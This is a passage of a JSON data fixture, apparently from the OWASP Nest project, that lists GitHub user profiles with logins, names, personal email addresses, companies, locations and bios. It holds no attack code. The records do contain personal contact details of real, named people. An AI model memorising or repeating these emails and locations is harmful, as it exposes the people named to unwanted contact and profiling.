"2024-09-12T02:30:27.105Z", + "nest_updated_at": "2024-09-12T02:30:27.921Z", + "name": "Diógenes Fernandes", + "login": "diofeher", + "email": "diofeher@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/161360?v=4", + "company": "", + "location": "João Pessoa - PB", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 151, + "public_gists_count": 41, + "public_repositories_count": 54, + "created_at": "2009-12-03T12:19:31Z", + "updated_at": "2024-08-03T08:37:52Z", + "node_id": "MDQ6VXNlcjE2MTM2MA==", + "bio": "staff platform engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2857, + "fields": { + "nest_created_at": "2024-09-12T02:30:28.722Z", + "nest_updated_at": "2024-09-12T02:30:28.722Z", + "name": "Jan Stourac", + "login": "jstourac", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12250881?v=4", + "company": "Red Hat", + "location": "Czech Republic", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 53, + "created_at": "2015-05-05T10:41:50Z", + "updated_at": "2024-09-11T12:20:05Z", + "node_id": "MDQ6VXNlcjEyMjUwODgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2858, + "fields": { + "nest_created_at": "2024-09-12T02:30:29.538Z", + "nest_updated_at": "2024-09-12T02:30:57.411Z", + "name": "Anton Bolshakov", + "login": "blshkv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/309751?v=4", + "company": "ITDefence", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 83, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2010-06-20T02:21:34Z", + "updated_at": "2024-08-26T21:38:42Z", + "node_id": "MDQ6VXNlcjMwOTc1MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2859, + "fields": { + "nest_created_at": "2024-09-12T02:30:30.378Z", + "nest_updated_at": "2024-09-12T02:30:30.378Z", + "name": "Martin Bobak", + "login": "bobekebob", + "email": "martin.bobak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6470010?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-01-22T10:02:16Z", + "updated_at": "2024-07-25T07:46:18Z", + "node_id": "MDQ6VXNlcjY0NzAwMTA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2860, + "fields": { + "nest_created_at": "2024-09-12T02:30:31.205Z", + "nest_updated_at": "2024-09-12T02:30:31.205Z", + "name": "", + "login": "lijodigiledge", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39552643?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-05-23T09:05:11Z", + "updated_at": "2019-10-09T09:45:32Z", + "node_id": "MDQ6VXNlcjM5NTUyNjQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2861, + "fields": { + "nest_created_at": "2024-09-12T02:30:32.037Z", + "nest_updated_at": "2024-09-12T02:30:32.037Z", + "name": "", + "login": "naveenrajamannar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8857538?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-09-22T06:51:15Z", + "updated_at": "2024-07-30T04:23:25Z", + "node_id": "MDQ6VXNlcjg4NTc1Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2862, + "fields": { + "nest_created_at": "2024-09-12T02:30:32.847Z", + "nest_updated_at": "2024-09-12T02:30:32.847Z", + "name": "Oskar Zabik", + "login": "smogg", + "email": "oskar.zabik@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1500714?v=4", + "company": "fragmentapp.io", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 8, + "public_repositories_count": 37, + "created_at": "2012-03-04T22:43:54Z", + "updated_at": "2024-06-10T08:38:08Z", + "node_id": "MDQ6VXNlcjE1MDA3MTQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2863, + "fields": { + "nest_created_at": "2024-09-12T02:30:33.654Z", + "nest_updated_at": "2024-09-12T02:30:33.654Z", + "name": "Jeff Blane", + "login": "synthet1c-info", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7847153?v=4", + "company": "", + "location": "Earth", + "collaborators_count": 0, + "following_count": 41, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2014-06-10T08:36:38Z", + "updated_at": "2024-08-25T12:43:37Z", + "node_id": "MDQ6VXNlcjc4NDcxNTM=", + "bio": "OSCP |\r\nOSWP |\r\neWPTXv2        \r\nJust another infosec n00b 🌍 \r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2864, + "fields": { + "nest_created_at": "2024-09-12T02:30:34.496Z", + "nest_updated_at": "2024-09-22T20:25:59.934Z", + "name": "", + "login": "Ashrith-Shetty", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52630129?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2019-07-07T14:58:16Z", + "updated_at": "2024-07-05T13:15:04Z", + "node_id": "MDQ6VXNlcjUyNjMwMTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2865, + "fields": { + "nest_created_at": "2024-09-12T02:30:37.200Z", + "nest_updated_at": "2024-09-12T02:30:37.200Z", + "name": "OxMarco", + "login": "OxMarco", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10283625?v=4", + "company": "", + "location": "Somewhere in Europe", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 61, + "public_gists_count": 9, + "public_repositories_count": 46, + "created_at": "2014-12-23T20:04:21Z", + "updated_at": "2024-09-10T11:06:14Z", + "node_id": "MDQ6VXNlcjEwMjgzNjI1", + "bio": "Doing stuff at the edge of hardware and software", + "is_hireable": true, + "twitter_username": "OxMarco_" + } +}, +{ + "model": "github.user", + "pk": 2866, + "fields": { + "nest_created_at": "2024-09-12T02:30:37.998Z", + "nest_updated_at": "2024-09-12T02:31:29.667Z", + "name": "Alvin", + "login": "flamecopper", + "email": "ykoo1@e.ntu.edu.sg", + "avatar_url": "https://avatars.githubusercontent.com/u/1225583?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-11-28T15:14:07Z", + "updated_at": "2024-07-13T03:09:03Z", + "node_id": "MDQ6VXNlcjEyMjU1ODM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2867, + "fields": { + "nest_created_at": "2024-09-12T02:30:43.258Z", + "nest_updated_at": "2024-09-12T02:30:43.258Z", + "name": "", + "login": "Robigus92", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26094268?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-02-28T17:49:39Z", + "updated_at": "2024-09-10T07:09:00Z", + "node_id": "MDQ6VXNlcjI2MDk0MjY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2868, + "fields": { + "nest_created_at": "2024-09-12T02:30:46.652Z", + "nest_updated_at": "2024-09-12T02:30:46.652Z", + "name": "", + "login": "mariogd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7890058?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-06-14T19:12:42Z", + "updated_at": "2020-10-08T03:04:06Z", + "node_id": "MDQ6VXNlcjc4OTAwNTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2869, + "fields": { + "nest_created_at": "2024-09-12T02:30:47.454Z", + "nest_updated_at": "2024-09-22T20:26:04.768Z", + "name": "Saurabh Nandedkar", + "login": "EXTREMOPHILARUM", + "email": "extremophilarum@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22239978?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 32, + "public_gists_count": 1, + "public_repositories_count": 39, + "created_at": "2016-09-16T14:36:59Z", + "updated_at": "2024-09-17T06:11:23Z", + "node_id": "MDQ6VXNlcjIyMjM5OTc4", + "bio": "", + "is_hireable": true, + "twitter_username": "EXTREMOPHILARUM" + } +}, +{ + "model": "github.user", + "pk": 2870, + "fields": { + "nest_created_at": "2024-09-12T02:30:49.116Z", + "nest_updated_at": "2024-09-22T20:25:57.945Z", + "name": "Mohit sharma", + "login": "sharmamohit123", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31919606?v=4", + "company": "IIIT Hyderabad", + "location": "Hyderabad", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2017-09-13T09:07:35Z", + "updated_at": "2024-02-20T19:55:31Z", + "node_id": "MDQ6VXNlcjMxOTE5NjA2", + "bio": "Research undergrad @IIIT-Hyderabad, open source contributor @OWASP", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2871, + "fields": { + "nest_created_at": "2024-09-12T02:30:52.425Z", + "nest_updated_at": "2024-09-12T02:30:52.425Z", + "name": "Rohan", + "login": "Rohan-Salwan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73494189?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2020-10-26T18:15:10Z", + "updated_at": "2024-05-15T04:35:42Z", + "node_id": "MDQ6VXNlcjczNDk0MTg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2872, + "fields": { + "nest_created_at": "2024-09-12T02:30:53.248Z", + "nest_updated_at": "2024-09-12T02:30:53.248Z", + "name": "", + "login": "Udbhavbisarya23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43880582?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-10-05T11:19:30Z", + "updated_at": "2024-08-24T22:37:50Z", + "node_id": "MDQ6VXNlcjQzODgwNTgy", + "bio": "Final Year, National Institute of Technology Karnataka. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2873, + "fields": { + "nest_created_at": "2024-09-12T02:30:54.061Z", + "nest_updated_at": "2024-09-12T02:30:54.061Z", + "name": "", + "login": "robindhondt95", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36512888?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-02-15T16:46:08Z", + "updated_at": "2024-05-13T18:08:34Z", + "node_id": "MDQ6VXNlcjM2NTEyODg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2874, + "fields": { + "nest_created_at": "2024-09-12T02:30:54.902Z", + "nest_updated_at": "2024-09-12T02:30:54.902Z", + "name": "", + "login": "rahultalekar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32674792?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2017-10-10T12:55:13Z", + "updated_at": "2024-01-05T05:55:12Z", + "node_id": "MDQ6VXNlcjMyNjc0Nzky", + "bio": "Learn&Share", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2875, + "fields": { + "nest_created_at": "2024-09-12T02:30:55.740Z", + "nest_updated_at": "2024-09-12T02:30:55.741Z", + "name": "", + "login": "cybersecpwn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85986040?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-16T07:09:09Z", + "updated_at": "2021-06-16T07:24:53Z", + "node_id": "MDQ6VXNlcjg1OTg2MDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2876, + "fields": { + "nest_created_at": "2024-09-12T02:30:56.549Z", + "nest_updated_at": "2024-09-22T19:36:03.908Z", + "name": "Michael Wager", + "login": "mwager", + "email": "mail@mwager.de", + "avatar_url": "https://avatars.githubusercontent.com/u/999748?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 42, + "followers_count": 21, + "public_gists_count": 4, + "public_repositories_count": 43, + "created_at": "2011-08-23T18:57:24Z", + "updated_at": "2024-08-22T07:22:23Z", + "node_id": "MDQ6VXNlcjk5OTc0OA==", + "bio": "Cyber security consultant with strong software engineering background", + "is_hireable": true, + "twitter_username": "michael_wager" + } +}, +{ + "model": "github.user", + "pk": 2877, + "fields": { + "nest_created_at": "2024-09-12T02:30:58.216Z", + "nest_updated_at": "2024-09-12T02:30:58.216Z", + "name": "Eshwar S", + "login": "EsharkyTheGreat", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75795114?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 32, + "public_gists_count": 2, + "public_repositories_count": 56, + "created_at": "2020-12-10T14:21:58Z", + "updated_at": "2024-09-05T06:05:26Z", + "node_id": "MDQ6VXNlcjc1Nzk1MTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2878, + "fields": { + "nest_created_at": "2024-09-12T02:30:59.036Z", + "nest_updated_at": "2024-09-12T02:30:59.036Z", + "name": "bruh", + "login": "AmeliaYeah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87606015?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 3, + "created_at": "2021-07-18T12:37:27Z", + "updated_at": "2024-09-08T15:41:28Z", + "node_id": "MDQ6VXNlcjg3NjA2MDE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2879, + "fields": { + "nest_created_at": "2024-09-12T02:30:59.849Z", + "nest_updated_at": "2024-09-22T20:26:00.957Z", + "name": "Gaurav ", + "login": "gaurav884", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57193590?v=4", + "company": "", + "location": "Mandi, Himachal Pradesh", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2019-10-30T18:28:50Z", + "updated_at": "2023-12-04T17:26:40Z", + "node_id": "MDQ6VXNlcjU3MTkzNTkw", + "bio": "SDE-1 Intern @ LYBL || GSoC '23 '22 @ OWASP || NIT Hamirpur '23", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2880, + "fields": { + "nest_created_at": "2024-09-12T02:31:00.693Z", + "nest_updated_at": "2024-09-12T02:31:00.693Z", + "name": "Josh Robar", + "login": "jerobar", + "email": "joshrobar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20042690?v=4", + "company": "", + "location": "Davao City, Philippines", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2016-06-20T10:53:44Z", + "updated_at": "2024-08-14T02:47:54Z", + "node_id": "MDQ6VXNlcjIwMDQyNjkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2881, + "fields": { + "nest_created_at": "2024-09-12T02:31:01.489Z", + "nest_updated_at": "2024-09-12T02:31:01.489Z", + "name": "Sebastian", + "login": "sebix", + "email": "sebix@sebix.at", + "avatar_url": "https://avatars.githubusercontent.com/u/199050?v=4", + "company": "Institute for Common Good Technology", + "location": "Austria", + "collaborators_count": 0, + "following_count": 249, + "followers_count": 103, + "public_gists_count": 7, + "public_repositories_count": 120, + "created_at": "2010-02-07T19:03:02Z", + "updated_at": "2024-09-08T15:18:18Z", + "node_id": "MDQ6VXNlcjE5OTA1MA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2882, + "fields": { + "nest_created_at": "2024-09-12T02:31:03.149Z", + "nest_updated_at": "2024-09-22T20:26:03.520Z", + "name": "Aviral Jain", + "login": "ph1ne4s", + "email": "jainaviral2002@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/54772821?v=4", + "company": "@InfoSecIITR @marsiitr", + "location": "IIT Roorkee", + "collaborators_count": 0, + "following_count": 86, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2019-09-01T14:51:49Z", + "updated_at": "2024-08-28T12:15:08Z", + "node_id": "MDQ6VXNlcjU0NzcyODIx", + "bio": "GSoC'23 @OWASP | IIT Roorkee'25\r\n", + "is_hireable": true, + "twitter_username": "ph1ne4s7" + } +}, +{ + "model": "github.user", + "pk": 2883, + "fields": { + "nest_created_at": "2024-09-12T02:31:03.977Z", + "nest_updated_at": "2024-09-12T02:31:03.977Z", + "name": "", + "login": "jeanphi72", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86831014?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-02T10:13:05Z", + "updated_at": "2023-06-05T07:02:24Z", + "node_id": "MDQ6VXNlcjg2ODMxMDE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2884, + "fields": { + "nest_created_at": "2024-09-12T02:31:05.592Z", + "nest_updated_at": "2024-09-12T02:31:05.592Z", + "name": "", + "login": "dookofcrds", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43824616?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-10-03T17:34:15Z", + "updated_at": "2024-02-28T15:20:02Z", + "node_id": "MDQ6VXNlcjQzODI0NjE2", + "bio": "🔐 Professional Cybersecurity Analyst | Penetration Tester | Expert in Ethical Hacking & Security\r\n\r\n🌐 Helping organizations secure their digital assets | ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2885, + "fields": { + "nest_created_at": "2024-09-12T02:31:06.390Z", + "nest_updated_at": "2024-09-12T02:31:06.390Z", + "name": "Nam Võ", + "login": "namdodayne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57885184?v=4", + "company": "SNP-VSEC", + "location": "Vietnam", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2019-11-18T04:12:23Z", + "updated_at": "2024-09-04T08:59:13Z", + "node_id": "MDQ6VXNlcjU3ODg1MTg0", + "bio": "Penetration Tester | Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2886, + "fields": { + "nest_created_at": "2024-09-12T02:31:07.228Z", + "nest_updated_at": "2024-09-22T20:26:04.455Z", + "name": "Pratham Agarwal", + "login": "Pratham1812", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32198580?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2017-09-22T13:17:52Z", + "updated_at": "2024-09-13T14:04:37Z", + "node_id": "MDQ6VXNlcjMyMTk4NTgw", + "bio": "ECE undergrad @IITRoorkee | CTF player with @InfoSecIITR | Developer @mdgspace | GSoC '24 @OWASP\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2887, + "fields": { + "nest_created_at": "2024-09-12T02:31:09.019Z", + "nest_updated_at": "2024-09-22T20:26:05.082Z", + "name": "Rahul Surwade", + "login": "rahulsurwade08", + "email": "rtr.rahulsurwade@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/93492791?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2021-10-31T20:40:38Z", + "updated_at": "2024-08-24T21:55:29Z", + "node_id": "U_kgDOBZKWNw", + "bio": "Cloud and Cybersecurity Practitioner", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2888, + "fields": { + "nest_created_at": "2024-09-12T02:31:10.649Z", + "nest_updated_at": "2024-09-12T02:31:10.649Z", + "name": "Aleksa Majkić", + "login": "AleksaMCode", + "email": "aleksamcode@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23129943?v=4", + "company": "", + "location": "Banja Luka, Bosnia and Herzegovina", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 73, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2016-10-28T23:24:15Z", + "updated_at": "2024-08-30T10:16:23Z", + "node_id": "MDQ6VXNlcjIzMTI5OTQz", + "bio": "I code. Sometimes.", + "is_hireable": false, + "twitter_username": "aleksamcode" + } +}, +{ + "model": "github.user", + "pk": 2889, + "fields": { + "nest_created_at": "2024-09-12T02:31:11.472Z", + "nest_updated_at": "2024-09-12T02:31:12.310Z", + "name": "", + "login": "vbondarchuk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39590898?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-05-24T12:33:39Z", + "updated_at": "2024-06-06T04:47:09Z", + "node_id": "MDQ6VXNlcjM5NTkwODk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2890, + "fields": { + "nest_created_at": "2024-09-12T02:31:13.133Z", + "nest_updated_at": "2024-09-22T20:26:05.397Z", + "name": "Vinh Pham Ngoc Thanh", + "login": "VinhPham2106", + "email": "vphamngo@purdue.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/111932850?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2022-08-24T00:09:17Z", + "updated_at": "2024-09-12T03:51:13Z", + "node_id": "U_kgDOBqv1sg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2891, + "fields": { + "nest_created_at": "2024-09-12T02:31:21.026Z", + "nest_updated_at": "2024-09-22T20:25:54.693Z", + "name": "BD", + "login": "flabbergastedbd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2751016?v=4", + "company": "@confluentinc ", + "location": "Bangalore, India", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 197, + "public_gists_count": 4, + "public_repositories_count": 29, + "created_at": "2012-11-08T13:38:55Z", + "updated_at": "2024-08-28T18:30:53Z", + "node_id": "MDQ6VXNlcjI3NTEwMTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "flabbergastedbd" + } +}, +{ + "model": "github.user", + "pk": 2892, + "fields": { + "nest_created_at": "2024-09-12T02:31:28.011Z", + "nest_updated_at": "2024-09-12T02:31:28.011Z", + "name": "Nick Heinbaugh", + "login": "nheinbaugh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2780977?v=4", + "company": "ClickUp", + "location": "Seattle", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2012-11-12T19:39:52Z", + "updated_at": "2024-09-06T20:31:48Z", + "node_id": "MDQ6VXNlcjI3ODA5Nzc=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2893, + "fields": { + "nest_created_at": "2024-09-12T02:31:28.838Z", + "nest_updated_at": "2024-09-22T20:26:16.109Z", + "name": "", + "login": "ojasp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15022394?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-10-07T21:57:51Z", + "updated_at": "2024-08-23T13:10:54Z", + "node_id": "MDQ6VXNlcjE1MDIyMzk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2894, + "fields": { + "nest_created_at": "2024-09-12T02:32:02.003Z", + "nest_updated_at": "2024-09-22T20:27:59.291Z", + "name": "Enterprise Security API", + "login": "ESAPI", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5580725?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 27, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-09-30T22:47:32Z", + "updated_at": "2016-02-27T11:27:02Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjU1ODA3MjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2895, + "fields": { + "nest_created_at": "2024-09-12T02:32:05.085Z", + "nest_updated_at": "2024-09-12T02:32:05.085Z", + "name": "b-long", + "login": "b-long", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66993?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 241, + "followers_count": 42, + "public_gists_count": 9, + "public_repositories_count": 30, + "created_at": "2009-03-25T13:12:23Z", + "updated_at": "2024-08-23T18:51:15Z", + "node_id": "MDQ6VXNlcjY2OTkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2896, + "fields": { + "nest_created_at": "2024-09-12T02:32:05.878Z", + "nest_updated_at": "2024-09-12T02:32:05.878Z", + "name": "", + "login": "stefanuzz86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87862170?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-23T12:40:22Z", + "updated_at": "2021-07-23T12:40:22Z", + "node_id": "MDQ6VXNlcjg3ODYyMTcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2897, + "fields": { + "nest_created_at": "2024-09-12T02:32:07.554Z", + "nest_updated_at": "2024-09-22T20:27:34.309Z", + "name": "Bharath Mannaperumal", + "login": "bharathmit", + "email": "bharathkumar.feb14@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6636257?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-02-10T06:38:05Z", + "updated_at": "2024-09-11T11:54:41Z", + "node_id": "MDQ6VXNlcjY2MzYyNTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2898, + "fields": { + "nest_created_at": "2024-09-12T02:32:13.757Z", + "nest_updated_at": "2024-09-12T02:35:14.244Z", + "name": "Max Gelman", + "login": "meg23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/814859?v=4", + "company": "@tackle-io ", + "location": "Plano, TX", + "collaborators_count": 0, + "following_count": 57, + "followers_count": 19, + "public_gists_count": 10, + "public_repositories_count": 100, + "created_at": "2011-05-27T19:15:48Z", + "updated_at": "2024-08-13T23:34:34Z", + "node_id": "MDQ6VXNlcjgxNDg1OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2899, + "fields": { + "nest_created_at": "2024-09-12T02:33:08.874Z", + "nest_updated_at": "2024-09-22T20:27:42.065Z", + "name": "Matt Seil", + "login": "xeno6696", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9502785?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 77, + "created_at": "2014-11-01T19:31:53Z", + "updated_at": "2024-08-18T17:16:01Z", + "node_id": "MDQ6VXNlcjk1MDI3ODU=", + "bio": "I'm a security professional in AppSec. I'm the Project Co-Lead on ESAPI-Java-Legacy along with @kwwall ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2900, + "fields": { + "nest_created_at": "2024-09-12T02:33:09.255Z", + "nest_updated_at": "2024-09-22T20:27:41.751Z", + "name": "", + "login": "jeremiahjstacey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16555944?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + 